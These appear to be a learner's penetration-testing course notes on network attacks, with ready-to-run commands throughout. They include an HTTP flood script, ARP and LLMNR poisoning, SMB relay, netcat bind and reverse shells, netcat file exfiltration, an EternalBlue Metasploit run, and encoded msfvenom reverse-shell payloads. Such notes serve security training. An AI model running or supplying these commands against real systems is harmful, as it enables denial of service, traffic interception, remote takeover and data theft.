Notes

Sec17 - Network Attacls

4 min read

Importance of Network Attacks

  • Impact spans from physical/network devices to application interactions
  • Helps testers validate segmentation, authentication, and service hardening

Core Lessons & Techniques

1. Stress Testing

  • Purpose: Push systems to their limits to identify DoS points of failure
  • Load Types:
    • CPU (processor-bound loops)
    • RAM (memory allocations)
    • Network (packet storms, high-throughput streams)
  • Scaling Approaches:
    • Vertical (↑ CPU, RAM on one server)
    • Horizontal (add more servers/load balancers)
  • Tools & Scripts:

    • Python example (HTTP flood):

      import requests, threading
def flood(target):
    while True:
        try:
            requests.get(target)
        except:
            pass
 
for i in range(100):
    t = threading.Thread(target=flood, args=("http://10.0.0.5/",))
    t.daemon = True
    t.start()
 
input("Press Enter to stop…")

    • Open-source: Grinder, Tsung

    • SaaS: LoadView, Loader

2. Bypassing Segmentation

  • Why: Network segments limit blast radius of attacks
  • Techniques:
    • VLAN Hopping
      • Switch Spoofing: Present as 802.1Q trunk port
      • Double-Tagging: Two VLAN tags, inner tag routes to victim VLAN
    • Multihomed Hosts
      • Devices on internal and DMZ segments—pivot points when compromised
  • Demo Example: 
    # Scan for inter-VLAN routes via Nmap
nmap -Pn -p 1433 --traceroute 10.0.1.50

- **Mitigation:** Harden trunk configurations, disable auto-trunking

---

### 3. MAC Spoofing

- **Concept:** Forge your NIC’s MAC address to impersonate an allowed device
- **Common Uses:** Bypass MAC-allow lists, evade NAC
- **Commands:**
    
    - **Kali/Linux (macchanger)**
        ```bash
        sudo macchanger -m 00:11:22:33:44:55 eth0    # set specific MAC
        sudo macchanger -r eth0                     # random MAC
        ```

    - **macOS**        
        ```bash
        sudo ifconfig en0 ether 00:11:22:33:44:55
        ```

---

### 4. NAC Bypass

- **NAC Types:**
    - _Persistent agent_ (corp-owned devices)
    - _Non-persistent agent_ (guest-downloaded)
    - _Agentless_ (802.1X, DHCP binding)

- **Bypass Methods:**    
    - Use an already-compliant host as pivot
    - Spoof exempt device MAC (VoIP phone, printer)

---

### 5. Session-Based (On-Path) Attacks

- **Replay:** Capture & resend valid traffic (e.g., auth handshakes)    
- **Relay:** Proxy between client & server (modify in-flight data)
- **Common Techniques:**
    - **ARP Poisoning**
        ```bash
        arpspoof -i eth0 -t 10.0.0.10 10.0.0.1     # poison target’s ARP cache
        echo 1 > /proc/sys/net/ipv4/ip_forward      # enable IP forwarding
        ```
        
    - **LLMNR/NBT-NS Poisoning** (Responder)
        ```bash
        responder -I eth0 -w -r
        ```
        
    - **DNS Spoofing** (dnschef, mitmproxy)

---

### 6. Service Exploitation

- **Certificate Services Attacks:** MD5 collision to spoof certs
- **Misconfigured Services:**
    - Directory listings → `http://10.0.0.5/backups/`
    - SMB shares →
        ```bash
        smbclient -L //10.0.0.5 -U guest        # list shares
        smbclient //10.0.0.5/secrets -U guest  # connect and download
        ```

---

### 7. Packet Crafting

- **Purpose:** Test firewalls / IDS / protocol implementations
- **Tools:** Scapy, Hping, Impacket
- **Scapy Demo (TCP SYN):**
    
    ```python
    from scapy.all import *
    pkt = IP(dst="10.0.0.5")/TCP(dport=22, flags="S")
    send(pkt)
    ```
    
- **SMB Relay (Impacket):**
    ```bash
    ntlmrelayx.py -t smb://10.0.0.5 -smb2support
    ```

---

### 8. Netcat (“Swiss-Army Knife”)

- **Bind Shell (victim listens):**
    ```bash
    # On victim:
    nc -l -p 4444 -e /bin/bash
    # On attacker:
    nc 10.0.0.5 4444
    ```

- **Reverse Shell (victim connects):**    
    ```bash
    # On attacker:
    nc -l -p 4444
    # On victim:
    nc 10.0.0.5 4444 -e /bin/bash
    ```

- **Data Exfiltration:**    
    ```bash
    # Attacker: listen on DNS port
    nc -l -p 53 > stolen.db
    # Victim: exfiltrate file
    nc 10.0.0.2 53 < backup.db
    ```    

---

### 9. Default Credentials

- **Risk:** Unchanged factory passwords → instant takeover
- **Scan & Test:**
    ```bash
    nmap --script default-credentials -p 22,80,443 10.0.0.0/24
    ```
- **Tools:** Hydra, Medusa for automated brute forcing

---

### 10. Metasploit & msfvenom

- **Metasploit Framework:**
    - Exploit modules, payloads, auxiliary scanners
    - **Example:**        
        ```bash
        msfconsole
        use exploit/windows/smb/ms17_010_eternalblue
        set RHOST 10.0.0.5
        set PAYLOAD windows/x64/meterpreter/reverse_tcp
        set LHOST 10.1.1.2
        exploit
        ```

- **msfvenom (payload gen):**    
    ```bash
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.2 LPORT=4444 \
             -f elf -o shell.elf
    ```

- **Encoding (Shikata Ga Nai):**    
    ```bash
    msfvenom -p cmd/unix/reverse_python LHOST=10.1.1.2 LPORT=4444 \
             -e x86/shikata_ga_nai -i 5 -f raw > payload.py
    ```

Graph View